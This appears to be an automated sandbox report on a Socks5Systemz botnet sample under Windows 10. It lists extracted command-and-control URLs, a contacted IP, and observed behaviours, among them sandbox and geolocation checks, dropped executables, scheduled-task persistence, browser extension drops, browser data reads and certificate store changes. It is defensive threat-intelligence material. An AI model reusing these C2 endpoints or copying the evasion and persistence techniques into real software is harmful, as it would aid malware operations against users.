Analysis
-
max time kernel
418s -
max time network
426s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
16/03/2024, 06:15
Static task
static1
URLScan task
urlscan1
Malware Config
Extracted
socks5systemz
http://ebskqpa.ua/search/?q=67e28dd83d5cf57a4406a9177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978f571ea771795af8e05c643db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608fff14c7ef95923e
http://ebskqpa.ua/search/?q=67e28dd83d5cf57a4406a9177c27d78406abdd88be4b12eab517aa5c96bd86ef9c8244825a8bbc896c58e713bc90c91836b5281fc235a925ed3e56d6bd974a95129070b610e96cc92be510b866db52b2e34aec4c2b14a82966836f23d7f210c7ee959f3ccd6f9e13
Signatures
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 330 5076 rundll32.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EK0DL3mZ4.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation EK0DL3mZ4.exe Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation lMmcdHQ.exe -
Executes dropped EXE 18 IoCs
pid Process 5968 setup_GE5UjxGqn5.tmp 4472 illinkdetector.exe 4168 ELeogOLxsWe.exe 5384 8Myq458QN8LWsBBIu.exe 2992 QlRCnaG.exe 4268 EK0DL3mZ4.exe 4900 QlRCnaG.exe 5808 8Myq458QN8LWsBBIu.tmp 1228 QlRCnaG.exe 6024 QlRCnaG.exe 3540 xmleditplus.exe 2428 QlRCnaG.exe 6044 xmleditplus.exe 636 Assistant_108.0.5067.20_Setup.exe_sfx.exe 4244 assistant_installer.exe 5680 assistant_installer.exe 2040 lLqrbhs.exe 5752 lMmcdHQ.exe -
Loads dropped DLL 17 IoCs
pid Process 5968 setup_GE5UjxGqn5.tmp 5968 setup_GE5UjxGqn5.tmp 5968 setup_GE5UjxGqn5.tmp 2992 QlRCnaG.exe 4168 ELeogOLxsWe.exe 4900 QlRCnaG.exe 4168 ELeogOLxsWe.exe 4168 ELeogOLxsWe.exe 5808 8Myq458QN8LWsBBIu.tmp 1228 QlRCnaG.exe 6024 QlRCnaG.exe 2428 QlRCnaG.exe 4244 assistant_installer.exe 4244 assistant_installer.exe 5680 assistant_installer.exe 5680 assistant_installer.exe 5076 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2932 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x00040000000208e4-787.dat upx behavioral1/memory/2992-797-0x0000000000110000-0x0000000000648000-memory.dmp upx behavioral1/files/0x00040000000208e4-786.dat upx behavioral1/memory/4900-823-0x0000000000110000-0x0000000000648000-memory.dmp upx behavioral1/files/0x00040000000208e4-801.dat upx behavioral1/memory/1228-842-0x0000000000950000-0x0000000000E88000-memory.dmp upx behavioral1/memory/1228-878-0x0000000000950000-0x0000000000E88000-memory.dmp upx behavioral1/files/0x00040000000208e4-881.dat upx behavioral1/memory/6024-898-0x0000000000110000-0x0000000000648000-memory.dmp upx behavioral1/memory/2428-906-0x0000000000110000-0x0000000000648000-memory.dmp upx behavioral1/files/0x00040000000208e4-897.dat upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 91.211.247.248 -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json lMmcdHQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json lMmcdHQ.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini lMmcdHQ.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: QlRCnaG.exe File opened (read-only) \??\D: QlRCnaG.exe File opened (read-only) \??\F: QlRCnaG.exe File opened (read-only) \??\D: QlRCnaG.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F lMmcdHQ.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini lLqrbhs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache lMmcdHQ.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol lLqrbhs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA lMmcdHQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 lMmcdHQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D lMmcdHQ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini EK0DL3mZ4.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 lMmcdHQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 lMmcdHQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA lMmcdHQ.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi lMmcdHQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja lMmcdHQ.exe File created C:\Program Files (x86)\BcAiYiAGnYnU2\NoVoaCpBfMOYU.dll lMmcdHQ.exe File created C:\Program Files (x86)\sqlNiOiyVkxxalmKguR\KodRbmg.dll lMmcdHQ.exe File created C:\Program Files (x86)\sqlNiOiyVkxxalmKguR\AdZtWjt.xml lMmcdHQ.exe File created C:\Program Files (x86)\VOWOsgMNhCULC\cPKYQVA.xml lMmcdHQ.exe File created C:\Program Files (x86)\FSlibiqhU\ooCBMY.dll lMmcdHQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak lMmcdHQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi lMmcdHQ.exe File created C:\Program Files (x86)\FSlibiqhU\DeFCOOK.xml lMmcdHQ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak lMmcdHQ.exe File created C:\Program Files (x86)\BcAiYiAGnYnU2\nPMSSSo.xml lMmcdHQ.exe File created C:\Program Files (x86)\VOWOsgMNhCULC\NPDTqYN.dll lMmcdHQ.exe File created C:\Program Files (x86)\mjOSdaDNjoUn\NMLxpPz.dll lMmcdHQ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bNhfIGhlWGwUbRxNhy.job schtasks.exe File created C:\Windows\Tasks\UibzgkEAjDCJKFems.job schtasks.exe File created C:\Windows\Tasks\pOefcubdrFOsjoJ.job schtasks.exe File created C:\Windows\Tasks\DuIvHtXTDSzBVHbay.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 53 IoCs
pid pid_target Process procid_target 2192 4472 WerFault.exe 125 3200 4472 WerFault.exe 125 5712 4472 WerFault.exe 125 732 4472 WerFault.exe 125 2276 4472 WerFault.exe 125 3052 4472 WerFault.exe 125 5336 4472 WerFault.exe 125 2512 4472 WerFault.exe 125 3268 4472 WerFault.exe 125 3156 4472 WerFault.exe 125 2644 4472 WerFault.exe 125 5596 4472 WerFault.exe 125 3924 4472 WerFault.exe 125 5276 4472 WerFault.exe 125 3536 4472 WerFault.exe 125 2444 4472 WerFault.exe 125 4448 4472 WerFault.exe 125 5704 4472 WerFault.exe 125 5180 4472 WerFault.exe 125 5100 4472 WerFault.exe 125 6064 4472 WerFault.exe 125 1100 4472 WerFault.exe 125 1176 4472 WerFault.exe 125 3044 4472 WerFault.exe 125 4296 4472 WerFault.exe 125 2872 4472 WerFault.exe 125 4336 4472 WerFault.exe 125 5548 4472 WerFault.exe 125 4644 4472 WerFault.exe 125 3488 4472 WerFault.exe 125 6076 4472 WerFault.exe 125 6036 4472 WerFault.exe 125 4436 4472 WerFault.exe 125 3748 4472 WerFault.exe 125 3792 4472 WerFault.exe 125 4524 4472 WerFault.exe 125 5376 4472 WerFault.exe 125 2964 4472 WerFault.exe 125 1740 4472 WerFault.exe 125 3864 4472 WerFault.exe 125 1612 4472 WerFault.exe 125 672 4472 WerFault.exe 125 2124 4472 WerFault.exe 125 2812 4472 WerFault.exe 125 5548 4472 WerFault.exe 125 2788 4472 WerFault.exe 125 2860 4472 WerFault.exe 125 4876 4472 WerFault.exe 125 5276 4472 WerFault.exe 125 4948 4472 WerFault.exe 125 5748 4472 WerFault.exe 125 5272 4472 WerFault.exe 125 5616 4472 WerFault.exe 125 -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000300000002283e-779.dat nsis_installer_1 behavioral1/files/0x000300000002283e-779.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4592 schtasks.exe 5124 schtasks.exe 2944 schtasks.exe 3488 schtasks.exe 5532 schtasks.exe 2116 schtasks.exe 2532 schtasks.exe 5272 schtasks.exe 1912 schtasks.exe 5264 schtasks.exe 5516 schtasks.exe 3544 schtasks.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS EK0DL3mZ4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName EK0DL3mZ4.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket lMmcdHQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" lMmcdHQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ef7552f8-0000-0000-0000-d01200000000}\NukeOnDelete = "0" lMmcdHQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" lMmcdHQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume lMmcdHQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ef7552f8-0000-0000-0000-d01200000000} lMmcdHQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" lMmcdHQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lMmcdHQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" lMmcdHQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" lMmcdHQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ lMmcdHQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings msedge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e QlRCnaG.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a